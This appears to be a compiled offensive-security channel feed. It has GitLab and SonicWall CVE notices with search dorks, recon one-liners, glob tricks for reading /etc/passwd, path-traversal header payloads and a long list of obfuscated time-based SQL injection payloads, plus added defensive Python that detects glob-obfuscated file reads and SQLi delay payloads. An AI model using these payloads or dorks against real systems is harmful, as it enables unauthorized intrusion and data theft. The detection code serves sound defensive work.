CVE-2025-0314 and others: Multiple vulnerabilities in GitLab, 4.3 - 8.7 rating
In a recent advisory, GitLab wrote about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
Link: https://nt.ls/BNKS8
Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
# List known .js URLs for a domain with gau, fetch them with httpx, and print the URLs and paths referenced inside each script.
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \
| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" -json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
Where is the reaction guys? It's a good way to support the channel, so please do leave your reaction to grow this community. Thanks!
Join Our Discussion Group - https://t.iss.one/brutsec
Ultimate FFUF Cheat Sheet!
https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150
Top 10 OffSec Certifications - Salary Wise
Use shell globbing / wildcard expansion. Here is an example:
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."
/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d.
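Because the shell rewrites the pattern before the program runs, a filter or alert that looks for the literal string /etc/passwd never sees it. The following is an added example (not from the original post) that resolves wildcard arguments in logged command lines against a watchlist; the watchlist, function names and sample lines are assumptions made for illustration.

```python
import fnmatch
import shlex

# Assumed watchlist of sensitive files (illustrative, not from the original post).
SENSITIVE_PATHS = ["/etc/passwd", "/etc/shadow", "/root/.ssh/id_rsa"]
GLOB_CHARS = set("*?[")


def glob_hits(pattern, watchlist=SENSITIVE_PATHS):
    """Return the watchlist paths that a shell glob pattern could expand to.

    Matching is done per path component because the shell's '*' never
    crosses a '/' (fnmatch applied to the whole string would).
    """
    parts = pattern.split("/")
    hits = []
    for path in watchlist:
        target = path.split("/")
        if len(parts) == len(target) and all(
            fnmatch.fnmatchcase(t, p) for p, t in zip(parts, target)
        ):
            hits.append(path)
    return hits


def flag_command(cmdline):
    """Map each wildcard argument of a logged command to the sensitive paths it reaches."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the log line
        tokens = cmdline.split()
    findings = {}
    for tok in tokens:
        if GLOB_CHARS & set(tok):
            hits = glob_hits(tok)
            if hits:
                findings[tok] = hits
    return findings


# Constructed audit-log samples: two obfuscated reads, two harmless globs.
SAMPLES = ["cat /e*c/p*s*d", "cat /etc/pass??", "ls /var/log/*.log", "cat /e*d"]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{line!r:22} -> {flag_command(line)}")
```

The matcher is deliberately conservative: unlike the shell, it lets `*` match a leading dot, so it may flag a pattern the shell would not expand.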
CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating
A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.
Search at Netlas.io:
Link: https://nt.ls/FLFJT
Dork: http.headers.server:"SMA"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
Intercept the request in Burp and replace the Accept header with:
Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
Time-based payloads for different DBMS:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
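For detection, the list above shows why matching raw request strings is not enough: the delay call is hidden behind URL encoding and inline comments. This added example (not part of the original post; function names and the sample request are constructed) normalizes a parameter value first and then looks for the delay primitive of each DBMS.

```python
import re
from urllib.parse import unquote

# Delay primitives used by the payloads above, keyed by the DBMS that implements them.
DELAY_PATTERNS = [
    ("postgresql", re.compile(r"\bpg_sleep\s*\(")),
    ("mysql", re.compile(r"\bsleep\s*\(")),
    # \s* rather than \s+ so the run-together WAITFORDELAY spelling is caught too.
    ("mssql", re.compile(r"\bwaitfor\s*delay\b")),
]
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(value, max_rounds=3):
    """Undo the obfuscation layers seen in the list before matching."""
    for _ in range(max_rounds):             # handles double encoding: %2523 -> %23 -> '#'
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = INLINE_COMMENT.sub(" ", value)  # sleep/*f*/(7) -> sleep (7)
    return re.sub(r"\s+", " ", value).lower()


def delay_dbms(value):
    """Return the DBMS whose delay primitive appears in value, else None."""
    text = normalize(value)
    for dbms, pattern in DELAY_PATTERNS:
        if pattern.search(text):
            return dbms
    return None


def scan(params):
    """Return {parameter name: dbms} for every flagged request parameter."""
    return {k: d for k, v in params.items() if (d := delay_dbms(v))}


# Constructed request parameters; the payload values are taken from the list above.
SAMPLE = {
    "id": "'/*f*/or/*f*/sleep/*f*/(7)--%23",
    "sort": "%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23",
    "page": "'WAITFORDELAY'0:0:7'%23",
    "q": "how to sleep better (7 tips)",
}

if __name__ == "__main__":
    print(scan(SAMPLE))
```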